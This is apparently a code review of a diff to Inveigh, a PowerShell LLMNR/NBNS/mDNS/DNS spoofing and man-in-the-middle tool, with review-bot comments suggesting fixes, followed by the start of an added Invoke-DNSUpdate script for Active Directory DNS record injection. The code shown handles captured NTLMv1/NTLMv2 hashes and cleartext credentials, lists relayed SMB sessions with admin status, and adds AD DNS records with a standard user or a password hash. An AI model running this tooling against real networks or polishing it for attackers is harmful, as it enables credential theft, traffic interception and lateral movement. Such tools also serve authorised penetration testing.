-}
+ControlLoop
# Console Output Loop
try
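Review bot: The control loop is now started unconditionally, which is correct because OutputQueueLoop is the only thing that moves entries out of `$inveigh.output_queue`, but the removed condition suggests that was once an optimisation and nothing here explains why it is gone. Replace the bare `# Control Loop Start` with `# Control Loop Start - always required: the control runspace drains output_queue to console/file/log`.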
@@ -4177,7 +3922,7 @@ try
switch -wildcard ($inveigh.console_queue[0])
{
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
{
if($inveigh.output_stream_only)
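Review bot: The new patterns `"?`[`!`]*"` and `"?`[-`]*"` are misleading: inside a double-quoted string the backticks are consumed by the string parser, so `-like` receives `?[!]*` and `?[-]*`, where `[!]`/`[-]` appear to be treated as one-character classes and `?` consumes the leading `[`; the match seems to work only by that coincidence, and a reader will assume the brackets are escaped. A plain prefix test says what is meant: `{$_.StartsWith('[!]') -or $_.StartsWith('[-]')}`. The switch body continues outside the hunk.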
@@ -4258,7 +4003,7 @@ try
if($inveigh.cleartext_list.Count -gt 0)
{
- Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline)
+ Write-Output("[*] [$(Get-Date -format s)] Current unique cleartext captures:" + $inveigh.newline)
$inveigh.cleartext_list.Sort()
foreach($unique_cleartext in $inveigh.cleartext_list)
@@ -4275,12 +4020,12 @@ try
}
else
{
- Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline)
+ Write-Output("[+] [$(Get-Date -format s)] No cleartext credentials have been captured" + $inveigh.newline)
}
if($inveigh.POST_request_list.Count -gt 0)
{
- Write-Output("$(Get-Date -format 's') - Current unique POST request captures:" + $inveigh.newline)
+ Write-Output("[*] [$(Get-Date -format s)] Current unique POST request captures:" + $inveigh.newline)
$inveigh.POST_request_list.Sort()
foreach($unique_POST_request in $inveigh.POST_request_list)
@@ -4298,7 +4043,7 @@ try
if($inveigh.NTLMv1_list.Count -gt 0)
{
- Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
+ Write-Output("[*] [$(Get-Date -format s)] Current unique NTLMv1 challenge/response captures:" + $inveigh.newline)
$inveigh.NTLMv1_list.Sort()
foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
@@ -4315,7 +4060,7 @@ try
$unique_NTLMv1_account_last = ''
Start-Sleep -m 5
- Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
+ Write-Output("[*] [$(Get-Date -format s)] Current NTLMv1 IP addresses and usernames:" + $inveigh.newline)
foreach($NTLMv1_username in $inveigh.NTLMv1_username_list)
{
@@ -4326,12 +4071,12 @@ try
}
else
{
- Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
+ Write-Output("[+] [$(Get-Date -format s)] No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline)
}
if($inveigh.NTLMv2_list.Count -gt 0)
{
- Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
+ Write-Output("[*] [$(Get-Date -format s)] Current unique NTLMv2 challenge/response captures:" + $inveigh.newline)
$inveigh.NTLMv2_list.Sort()
foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
@@ -4348,7 +4093,7 @@ try
$unique_NTLMv2_account_last = ''
Start-Sleep -m 5
- Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
+ Write-Output("[*] [$(Get-Date -format s)] Current NTLMv2 IP addresses and usernames:" + $inveigh.newline)
foreach($NTLMv2_username in $inveigh.NTLMv2_username_list)
{
@@ -4358,7 +4103,7 @@ try
}
else
{
- Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
+ Write-Output("[+] [$(Get-Date -format s)] No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline)
}
$console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
@@ -4408,6 +4153,47 @@ if($inveigh)
if($inveigh.running -or $inveigh.relay_running)
{
+ if($inveigh.DNS_list.Count -gt 0)
+ {
+
+ foreach($DNS_host in $inveigh.DNS_list)
+ {
+
+ if($DNS_host.StartsWith("1,"))
+ {
+
+ $DNS_update = Invoke-DNSUpdate -DNSType A -DNSName $DNS_host.SubString(2)
+
+ if($DNS_update -eq "[+] DNS update successful")
+ {
+ $output = "[+] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " removed"
+ Write-Output $output
+ }
+ else
+ {
+ $output = "[-] [$(Get-Date -format s)] DNS host (A) record for " + $DNS_host.SubString(2) + " remove failed"
+ Write-Warning $output
+ }
+
+ if($inveigh.file_output)
+ {
+ $output | Out-File $Inveigh.log_out_file -Append
+ }
+
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add($output) > $null
+ }
+
+ }
+
+ }
+
+ $inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
+ }
+
if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
{
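Review bot: After the cleanup loop `$inveigh.DNS_list` is reset to an empty ArrayList even for entries whose removal was reported as "remove failed", so a second Stop-Inveigh cannot retry and the only trace of a record left behind in the domain is the warning text. Keep the failed entries instead (collect them into a list during the loop and assign that list back), and append "[Remove Manually]" to the failure message as the certificate branch does. The `"1,"` prefix convention is also undocumented here; a comment such as `# DNS_list entries are "<flag>,<hostname>"; "1," presumably marks a record Inveigh added and must remove - confirm against DNSCheck` would help, hedged because DNSCheck is not in this chunk.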
@@ -4426,56 +4212,57 @@ if($inveigh)
}
catch
{
- Write-Output("SSL Certificate Deletion Error - Remove Manually")
+ $output = "[-] [$(Get-Date -format s)] SSL Certificate Deletion Error [Remove Manually]"
if($inveigh.file_output)
{
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append
+ $output | Out-File $Inveigh.log_out_file -Append
}
if($inveigh.log_output)
{
- $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null
+ $inveigh.log.Add($output) > $null
}
+ Write-Warning $output
}
}
if($inveigh.relay_running)
{
+ $output = "[*] [$(Get-Date -format s)] Inveigh Relay is exiting"
if($inveigh.file_output)
{
- "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append
+ $output | Out-File $Inveigh.log_out_file -Append
}
if($inveigh.log_output)
{
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null
+ $inveigh.log.Add($output) > $null
}
- Write-Output("Inveigh Relay exited at $(Get-Date -format 's')")
+ Write-Output $output
$inveigh.relay_running = $false
-
}
if($inveigh.running)
{
+ $output = "[*] [$(Get-Date -format s)] Inveigh is exiting"
if($inveigh.file_output)
{
- "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append
+ $output | Out-File $Inveigh.log_out_file -Append
}
if($inveigh.log_output)
{
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null
+ $inveigh.log.Add($output) > $null
}
- Write-Output("Inveigh exited at $(Get-Date -format 's')")
+ Write-Output $output
$inveigh.running = $false
-
}
$inveigh.HTTPS = $false
@@ -4483,7 +4270,7 @@ if($inveigh)
}
else
{
- Write-Output("There are no running Inveigh functions")
+ Write-Output "[-] There are no running Inveigh functions"
}
}
@@ -4499,6 +4286,12 @@ Get-Inveigh will get stored Inveigh data from memory.
.PARAMETER Console
Get queued console output. This is also the default if no parameters are set.
+.PARAMETER DNS
+Get added DNS host records.
+
+.PARAMETER DNSFailed
+Get failed DNS host record adds.
+
.PARAMETER Learning
Get valid hosts discovered through spoofer learning.
@@ -4518,7 +4311,7 @@ Get captured NTLMv1 challenge/response hashes.
Get the first captured NTLMv1 challenge/response for each unique account.
.PARAMETER NTLMv1Usernames
-Get IP addresses and usernames for captured NTLMv2 challenge/response hashes.
+Get IP addresses and usernames for captured NTLMv1 challenge/response hashes.
.PARAMETER NTLMv2
Get captured NTLMv1 challenge/response hashes.
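Review bot: The copy-paste fix on the changed line is only half done: the unchanged `.PARAMETER NTLMv2` entry two lines below still reads `Get captured NTLMv1 challenge/response hashes.` and should say `Get captured NTLMv2 challenge/response hashes.`. Since the help text is the only place the two switches are told apart for a user, it is worth fixing in the same commit.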
@@ -4542,6 +4335,8 @@ param
[parameter(Mandatory=$false)][Switch]$Cleartext,
[parameter(Mandatory=$false)][Switch]$CleartextUnique,
[parameter(Mandatory=$false)][Switch]$Console,
+ [parameter(Mandatory=$false)][Switch]$DNS,
+ [parameter(Mandatory=$false)][Switch]$DNSFailed,
[parameter(Mandatory=$false)][Switch]$Learning,
[parameter(Mandatory=$false)][Switch]$Log,
[parameter(Mandatory=$false)][Switch]$NTLMv1,
@@ -4552,6 +4347,7 @@ param
[parameter(Mandatory=$false)][Switch]$NTLMv2Usernames,
[parameter(Mandatory=$false)][Switch]$POSTRequest,
[parameter(Mandatory=$false)][Switch]$POSTRequestUnique,
+ [parameter(Mandatory=$false)][Switch]$Session,
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
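Review bot: The new `-Session` switch has no `.PARAMETER Session` help entry anywhere in the help hunks of this commit; the DNS and DNSFailed switches added alongside it both got one. If it is not added elsewhere in the file, add `.PARAMETER Session` followed by `Get established relay SMB sessions with their target, user, admin status, and last activity.` in the comment-based help block.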
@@ -4572,7 +4368,7 @@ if($Console -or $PSBoundParameters.Count -eq 0)
switch -wildcard ($inveigh.console_queue[0])
{
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
{
Write-Warning $inveigh.console_queue[0]
$inveigh.console_queue.RemoveAt(0)
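Review bot: The new classifier relies on the backticks in `"?`[`!`]*"` reaching `-like` as escapes, but inside a double-quoted string PowerShell strips a backtick that precedes `[` or `]`, so the pattern `-like` actually evaluates is `?[!]*`: one arbitrary character, then the one-character class `[!]`, then anything. It matches `[!] …` lines only because `?` happens to consume the leading bracket, and it will equally match any message whose second character is `!` or `-`. A plain prefix test says what is meant and has no wildcard semantics: `{$_.StartsWith("[!]") -or $_.StartsWith("[-]")}`. The enclosing `if`/`switch` begins before this hunk.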
@@ -4592,6 +4388,36 @@ if($Console -or $PSBoundParameters.Count -eq 0)
}
+if($DNS)
+{
+
+ foreach($DNS in $inveigh.DNS_list)
+ {
+
+ if($DNS.StartsWith("1,"))
+ {
+ Write-Output $DNS.Substring(2)
+ }
+
+ }
+
+}
+
+if($DNSFailed)
+{
+
+ foreach($DNS in $inveigh.DNS_list)
+ {
+
+ if($DNS.StartsWith("0,"))
+ {
+ Write-Output $DNS.Substring(2)
+ }
+
+ }
+
+}
+
if($Log)
{
Write-Output $inveigh.log
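Review bot: Both new loops reuse the switch parameter as the loop variable (`foreach($DNS in $inveigh.DNS_list)` directly under `if($DNS)`), so after the first iteration `$DNS` holds a string from the list rather than the switch; nothing reads the switch afterwards so it is harmless today, but it is a trap for the next edit. Rename the iterator: `foreach($DNS_entry in $inveigh.DNS_list) { if($DNS_entry.StartsWith("1,")) { Write-Output $DNS_entry.Substring(2) } }`, and likewise with `"0,"` in the DNSFailed loop. The `1,`/`0,` prefix is an in-band success flag; a comment such as `# DNS_list entries are "<1|0>,<record>": 1 = record added, 0 = add failed` would help, assuming that is what the producer writes — it is not visible in this hunk.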
@@ -4678,6 +4504,37 @@ if($Learning)
Write-Output $inveigh.valid_host_list
}
+if($Session)
+{
+ $i = 1
+ $session_list = @()
+
+ while($i -le $inveigh.session_socket_table.Count)
+ {
+
+ if($inveigh.session_socket_table[$i].Connected)
+ {
+ $status = "connected"
+ }
+ else
+ {
+ $status = "disconnected"
+ }
+
+ $session_object = New-Object PSObject
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $i
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name System $inveigh.session_socket_table[$i].Client.RemoteEndpoint.Address.IPaddressToString
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name User $inveigh.session_user_table[$i]
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Admin $inveigh.session_privilege_table[$i]
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name Status $status
+ Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $inveigh.session_timestamp_table[$i]
+ $session_list += $session_object
+ $i++
+ }
+
+ Write-Output $session_list | Format-Table -AutoSize
+}
+
}
function Watch-Inveigh
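Review bot: `Get-Inveigh -Session` dereferences `$inveigh.session_socket_table[$i].Client.RemoteEndpoint.Address` unconditionally, but a TcpClient that has been closed exposes a null `Client`, so one torn-down relay session would make the whole listing throw instead of showing as disconnected (`.Connected` on such a client throws as well). Read the socket once per iteration, guard it, and default to "disconnected"; the 1-based `while` also assumes the table is keyed from 1, which I cannot confirm from this hunk. `Write-Output $session_list | Format-Table -AutoSize` is redundant (`$session_list | Format-Table -AutoSize` is the same), and emitting the raw objects instead would let callers `Where-Object` on User/Admin at the cost of the default list rendering for six properties.
```powershell
    while($i -le $inveigh.session_socket_table.Count)
    {
        $session_socket = $inveigh.session_socket_table[$i]
        $system = $null
        $status = "disconnected"

        # a closed TcpClient has a null Client; skip Connected/RemoteEndpoint in that case
        if($session_socket -and $session_socket.Client)
        {
            $system = $session_socket.Client.RemoteEndpoint.Address.IPaddressToString

            if($session_socket.Connected)
            {
                $status = "connected"
            }

        }

        $session_object = New-Object PSObject
        Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $i
        Add-Member -InputObject $session_object -MemberType NoteProperty -Name System $system
        # … unchanged: User, Admin, Status, "Last Activity" members …
        $session_list += $session_object
        $i++
    }
```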
@@ -4702,7 +4559,7 @@ if($inveigh.tool -ne 1)
if($inveigh.running -or $inveigh.relay_running)
{
- Write-Output "Press any key to stop real time console output"
+ Write-Output "[*] Press any key to stop real time console output"
$inveigh.console_output = $true
:console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
@@ -4714,7 +4571,7 @@ if($inveigh.tool -ne 1)
switch -wildcard ($inveigh.console_queue[0])
{
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
{
Write-Warning $inveigh.console_queue[0]
$inveigh.console_queue.RemoveAt(0)
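Review bot: This is the second copy of the same severity predicate (the other is in Get-Inveigh), and both will have to change in lockstep the next time the output prefix convention moves. A tiny shared helper removes the duplication and the wildcard subtlety: `function Test-InveighWarningLine { param([String]$line) $line.StartsWith("[!]") -or $line.StartsWith("[-]") }`, then `{Test-InveighWarningLine $_}` in both `switch` statements. As written, the double-quoted string strips the backticks before `-like` sees the pattern, so it evaluates `?[!]*` (any character, then the class `[!]`) rather than a literal-bracket match — it happens to work, but not for the reason the escaping suggests. The enclosing loop begins before this hunk.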
@@ -4766,13 +4623,13 @@ if($inveigh.tool -ne 1)
}
else
{
- Write-Output "Inveigh isn't running"
+ Write-Output "[-] Inveigh isn't running"
}
}
else
{
- Write-Output "Watch-Inveigh cannot be used with current external tool selection"
+ Write-Output "[-] Watch-Inveigh cannot be used with current external tool selection"
}
}
@@ -4790,11 +4647,11 @@ if($inveigh)
if(!$inveigh.running -and !$inveigh.relay_running)
{
Remove-Variable inveigh -scope global
- Write-Output "Inveigh data has been cleared from memory"
+ Write-Output "[+] Inveigh data has been cleared from memory"
}
else
{
- Write-Output "Run Stop-Inveigh before running Clear-Inveigh"
+ Write-Output "[-] Run Stop-Inveigh before running Clear-Inveigh"
}
}
diff --git a/Inveigh.psd1 b/Inveigh.psd1
index d3e601d..5195d9d 100644
--- a/Inveigh.psd1
+++ b/Inveigh.psd1
@@ -12,7 +12,7 @@
ModuleToProcess = 'Inveigh.psm1'
# Version number of this module.
-ModuleVersion = '1.0'
+ModuleVersion = '1.4'
# ID used to uniquely identify this module
GUID = '4f991a73-c574-44b7-85df-da769f39d45d'
diff --git a/Inveigh.psm1 b/Inveigh.psm1
index 96708d8..c7b0027 100644
--- a/Inveigh.psm1
+++ b/Inveigh.psm1
@@ -1,9 +1,9 @@
<#
.SYNOPSIS
-Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool.
+Inveigh is a Windows PowerShell LLMNR/NBNS/mDNS/DNS spoofer/man-in-the-middle tool.
.LINK
https://github.com/Kevin-Robertson/Inveigh
#>
-Import-Module $PWD\Scripts\Inveigh.ps1
-Import-Module $PWD\Scripts\Inveigh-Relay.ps1
\ No newline at end of file
+Import-Module $PWD\Inveigh.ps1
+Import-Module $PWD\Inveigh-Relay.ps1
\ No newline at end of file
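Review bot: Both new `Import-Module` lines still resolve the scripts against `$PWD`, so the module only loads when the caller's current directory happens to be the module root; `Import-Module Inveigh` from any other directory (or via `$env:PSModulePath`) will fail to find `Inveigh.ps1` and `Inveigh-Relay.ps1`. Since this is a `.psm1`, `$PSScriptRoot` is set to the module directory at load time: `Import-Module $PSScriptRoot\Inveigh.ps1` and `Import-Module $PSScriptRoot\Inveigh-Relay.ps1`. The file also still ends without a trailing newline, per the diff marker.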
diff --git a/Invoke-DNSUpdate.ps1 b/Invoke-DNSUpdate.ps1
new file mode 100644
index 0000000..658d486
--- /dev/null
+++ b/Invoke-DNSUpdate.ps1
@@ -0,0 +1,1437 @@
+function Invoke-DNSUpdate
+{
+ <#
+ .SYNOPSIS
+ This function performs secure and nonsecure DNS dynamic updates against an AD domain controller. Authentication
+ for secure updates is performed through Kerberos GSS-TSIG.
+
+ Author: Kevin Robertson (@kevin_robertson)
+ License: BSD 3-Clause
+
+ .DESCRIPTION
+ This function can be used to add/delete dynamic DNS records through secure or nonsecure dynamic updates against an
+ AD domain controller. A, AAAA, CNAME, MX, PTR, SRV, and TXT records are currently supported. Invoke-DNSUpdate is modeled
+ after BIND`s nsupdate tool when using the '-g' or 'gsstsig' options for secure updates or no authentication for
+ nonsecure updates.
+
+ By default, Active Directory-integrated zones have secure dynamic updates enabled with authenticated users having
+ 'Create all child objects' permission. Records that do not exist in an AD zone can be added/deleted with a standard
+ user account. Existing records created by default or created by other users impose limitations. For example, creating
+ records that apply to the root of the zone or creating additional SRV records for kerberos/ldap will likely be blocked
+ due to existing records. Note however that older existing dynamic records can sometimes be hijacked. Subdomain folders
+ can also be created.
+
+ With secure dynamic updates, this function supports only GSS-TSIG through Kerberos AES256-CTS-HMAC-SHA1-96 using
+ two separate methods. By default, the function will have Windows perform all Kerberos steps up until the AP-REQ
+ is sent to DNS on the DC. This method will work with either the current session context or with specified credentials.
+ The second method performs Kerberos authentication using just PowerShell code over a TCPClient connection. This method
+ will accept a password or AES256 hash and will not place any tickets in the client side cache.
+
+ In the event that a zone is configured for nonsecure dynamic updates, you should have full control over the zone.
+
+ Note that wpad and isatap are on a block list by default starting with Server 2008. Although the records can be added
+ with both secure and nonsecure dynamic updates, AD DNS will not answer requests for wpad and isatap if they are listed
+ on the block list.
+
+ .PARAMETER DomainController
+ Domain controller to target in FQDN format.
+
+ .PARAMETER Realm
+ Kerberos realm.
+
+ .PARAMETER Username
+ Username of user with DNS secure dynamic update access. If using a machine account, the trailing '$' must be
+ included.
+
+ .PARAMETER Password
+ Password of user with DNS secure dynamic update access. The password must be in the form of a secure string.
+
+ .PARAMETER Hash
+ AES256 password hash for user with DNS secure dynamic update access. Note that this will use Kerberos
+ authentication built on top of TCPClient.
+
+ .PARAMETER Security
+ Default = Secure: (Auto/Nonsecure/Secure) Dynamic update security type. Auto will attempt to use nonsecure. If
+ nonsecure fails, secure will be used. This is the standard dynamic update behavior. Secure is the default
+ because it generates less traffic.
+
+ .PARAMETER DNSName
+ DNS record name.
+
+ .PARAMETER DNSData
+ DNS records data. For most record types this will be the destination hostname or IP address. For TXT records
+ this can be used for data. If deleting a record, leave off this parameter.
+
+ .PARAMETER DNSType
+ DNS record type.
+
+ .PARAMETER DNSTTL
+ DNS record TTL.
+
+ .PARAMETER DNSPreference
+ DNS MX record priority
+
+ .PARAMETER DNSPriority
+ DNS SRV record priority.
+
+ .PARAMETER DNSWeight
+ DNS SRV record weight.
+
+ .PARAMETER DNSPort
+ DNS SRV record port.
+
+ .PARAMETER DNSZone
+ DNS zone.
+
+ .PARAMETER TCPClientAuth
+ Switch to force usage of the TCPClient based Kerberos authentication.
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType A -DNSName www.test.local -DNSData 192.168.100.125 -DNSTTL 84600
+ Add A Record
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType AAAA -DNSName www.test.local -DNSData 2001:0db8:85a3:0000:0000:8a2e:0370:7334
+ Add AAAA Record
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType CNAME -DNSName www.test.local -DNSData system.test.local
+ Add CNAME Record
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType MX -DNSName test.local -DNSData 192.168.100.125 -DNSPreference 10
+ Add MX Record
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType PTR -DNSName 125.100.168.192.in-addr.arpa -DNSData www.test.local -DNSZone 100.168.192.in-addr.arpa
+ Add PTR Record - there is a good chance this will be denied if there is an existing record for an IP
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType SRV -DNSName _autodiscover._tcp.lab.local -DNSData system.test.local -DNSPriority 100 -DNSWeight 80 -DNSPort 443
+ Add SRV Record
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType TXT -DNSName host.test.local -DNSData "some text"
+ Add TXT Record
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType TXT -DNSName host.test.local
+ Delete TXT record - all deletes follow the same format, just specify DNSType and DNSName
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType A -DNSName www.test.local -Username testuser
+ Add A record using another account
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType A -DNSName www.test.local -Username testuser -Hash 0C27E0A5B0D69640B40DDED4A28EB3BB0D157659EBED2816A41A8228E98D111B
+ Add A record using another account and an AES256 hash
+
+ .LINK
+ https://github.com/Kevin-Robertson/Powermad
+ #>
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$false)][String]$Realm,
+ [parameter(Mandatory=$false)][String]$Username,
+ [parameter(Mandatory=$false)][System.Security.SecureString]$Password,
+ [parameter(Mandatory=$false)][ValidateScript({$_.Length -eq 64})][String]$Hash,
+ [parameter(Mandatory=$false)][String]$DNSZone,
+ [parameter(Mandatory=$false)][Int]$DNSTTL = 600,
+ [parameter(Mandatory=$false)][Int]$DNSPreference,
+ [parameter(Mandatory=$false)][Int]$DNSPriority,
+ [parameter(Mandatory=$false)][Int]$DNSWeight,
+ [parameter(Mandatory=$false)][Int]$DNSPort,
+ [parameter(Mandatory=$false)][ValidateSet("Auto","Nonsecure","Secure")][String]$Security = "Secure",
+ [parameter(Mandatory=$true)][ValidateSet("A","AAAA","CNAME","MX","PTR","SRV","TXT")][String]$DNSType,
+ [parameter(Mandatory=$true)][String]$DNSName,
+ [parameter(Mandatory=$false)][ValidateScript({$_.Length -le 255})][String]$DNSData,
+ [parameter(Mandatory=$false)][Switch]$TCPClientAuth
+ )
+
+ if($TCPClientAuth -and !$Username)
+ {
+ Write-Output "[-] TCPClientAuth requires a username"
+ throw
+ }
+
+ switch ($DNSType)
+ {
+
+ 'MX'
+ {
+
+ if(!$DNSPreference)
+ {
+ Write-Output "[-] MX records require a DNSPreference"
+ throw
+ }
+
+ }
+
+ 'PTR'
+ {
+
+ if(!$DNSZone)
+ {
+ Write-Output "[-] PTR records require a DNSZone"
+ throw
+ }
+
+ }
+
+ 'SRV'
+ {
+
+ if(!$DNSPriority -and !$DNSWeight -and !$DNSPort -and $DNSData)
+ {
+ Write-Output "[-] DNSType SRV requires DNSPriority, DNSWeight, and DNSPort"
+ throw
+ }
+
+ if($DNSName -notlike '*._tcp.*' -and $DNSName -notlike '*._udp.*')
+ {
+ Write-Output "[-] DNSName doesn't contain a protocol"
+ throw
+ }
+
+ }
+
+ }
+
+ if($Username -and !$Hash)
+ {
+ $password = Read-Host -Prompt "Enter password" -AsSecureString
+ }
+
+ if(!$DomainController)
+ {
+
+ try
+ {
+ $current_domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
+ $DomainController = $current_domain.DomainControllers[0].Name
+ $domain = $current_domain.Name
+ }
+ catch
+ {
+ Write-Output "[-] Domain controller not located"
+ throw
+ }
+
+ }
+ else
+ {
+ $realm_index = $DomainController.IndexOf(".")
+ $domain = $DomainController.Substring($realm_index + 1)
+ }
+
+ if(!$Realm)
+ {
+ $realm = $domain
+ }
+
+ if($TCPClientAuth -or $Hash)
+ {
+
+ $kerberos_tcpclient = $true
+ $realm = $realm.ToUpper()
+
+ if($username -like "*\*")
+ {
+ $username = $username.SubString(($username.IndexOf("\") + 1),($username.Length - ($username.IndexOf("\") + 1)))
+ }
+
+ if($username -like "*@*")
+ {
+ $username = $username.SubString(0,($username.IndexOf("@")))
+ }
+
+ if($Username.EndsWith("$"))
+ {
+ $salt = $realm + "host" + $Username.SubString(0,$Username.Length - 1) + "." + $realm.ToLower()
+ }
+ else
+ {
+ $salt = $realm + $Username
+ }
+
+ Write-Verbose "[+] Salt $salt"
+ }
+
+ if(!$DNSZone)
+ {
+ $DNSZone_index = $DomainController.IndexOf(".")
+ $DNSZone = $DomainController.Substring($DNSZone_index + 1)
+ }
+
+ $DNSZone = $DNSZone.ToLower()
+
+ function ConvertFrom-PacketOrderedDictionary
+ {
+ param($ordered_dictionary)
+
+ ForEach($field in $ordered_dictionary.Values)
+ {
+ $byte_array += $field
+ }
+
+ return $byte_array
+ }
+
+ function Get-KerberosAES256UsageKey
+ {
+ param([String]$key_type,[Int]$usage_number,[Byte[]]$base_key)
+
+ $padding = 0x00 * 16
+
+ if($key_type -eq 'checksum')
+ {
+ switch($usage_number)
+ {
+ 25 {[Byte[]]$usage_constant = 0x5d,0xfb,0x7d,0xbf,0x53,0x68,0xce,0x69,0x98,0x4b,0xa5,0xd2,0xe6,0x43,0x34,0xba + $padding}
+ }
+ }
+ elseif($key_type -eq 'encrypt')
+ {
+
+ switch($usage_number)
+ {
+ 1 {[Byte[]]$usage_constant = 0xae,0x2c,0x16,0x0b,0x04,0xad,0x50,0x06,0xab,0x55,0xaa,0xd5,0x6a,0x80,0x35,0x5a + $padding}
+ 3 {[Byte[]]$usage_constant = 0xbe,0x34,0x9a,0x4d,0x24,0xbe,0x50,0x0e,0xaf,0x57,0xab,0xd5,0xea,0x80,0x75,0x7a + $padding}
+ 4 {[Byte[]]$usage_constant = 0xc5,0xb7,0xdc,0x6e,0x34,0xc7,0x51,0x12,0xb1,0x58,0xac,0x56,0x2a,0x80,0x95,0x8a + $padding}
+ 7 {[Byte[]]$usage_constant = 0xde,0x44,0xa2,0xd1,0x64,0xe0,0x51,0x1e,0xb7,0x5b,0xad,0xd6,0xea,0x80,0xf5,0xba + $padding}
+ 11 {[Byte[]]$usage_constant = 0xfe,0x54,0xaa,0x55,0xa5,0x02,0x52,0x2f,0xbf,0x5f,0xaf,0xd7,0xea,0x81,0x75,0xfa + $padding}
+ 12 {[Byte[]]$usage_constant = 0x05,0xd7,0xec,0x76,0xb5,0x0b,0x53,0x33,0xc1,0x60,0xb0,0x58,0x2a,0x81,0x96,0x0b + $padding}
+ }
+
+ }
+ elseif($key_type -eq 'integrity')
+ {
+
+ switch($usage_number)
+ {
+ 1 {[Byte[]]$usage_constant = 0x5b,0x58,0x2c,0x16,0x0a,0x5a,0xa8,0x05,0x56,0xab,0x55,0xaa,0xd5,0x40,0x2a,0xb5 + $padding}
+ 4 {[Byte[]]$usage_constant = 0x72,0xe3,0xf2,0x79,0x3a,0x74,0xa9,0x11,0x5c,0xae,0x57,0x2b,0x95,0x40,0x8a,0xe5 + $padding}
+ 7 {[Byte[]]$usage_constant = 0x8b,0x70,0xb8,0xdc,0x6a,0x8d,0xa9,0x1d,0x62,0xb1,0x58,0xac,0x55,0x40,0xeb,0x15 + $padding}
+ 11 {[Byte[]]$usage_constant = 0xab,0x80,0xc0,0x60,0xaa,0xaf,0xaa,0x2e,0x6a,0xb5,0x5a,0xad,0x55,0x41,0x6b,0x55 + $padding}
+ }
+
+ }
+
+ $AES = New-Object "System.Security.Cryptography.AesManaged"
+ $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
+ $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
+ $AES.IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $AES.KeySize = 256
+ $AES.Key = $base_key
+ $AES_encryptor = $AES.CreateEncryptor()
+ $usage_key = $AES_encryptor.TransformFinalBlock($usage_constant,0,$usage_constant.Length)
+
+ return $usage_key
+ }
+
+ # TCPClient Kerberos start - this section can be removed if not using a hash or -TCPClientAuth
+ function Get-KerberosAES256BaseKey
+ {
+ param([String]$salt,[System.Security.SecureString]$password)
+
+ $password_BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($password)
+ $password_cleartext = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($password_BSTR)
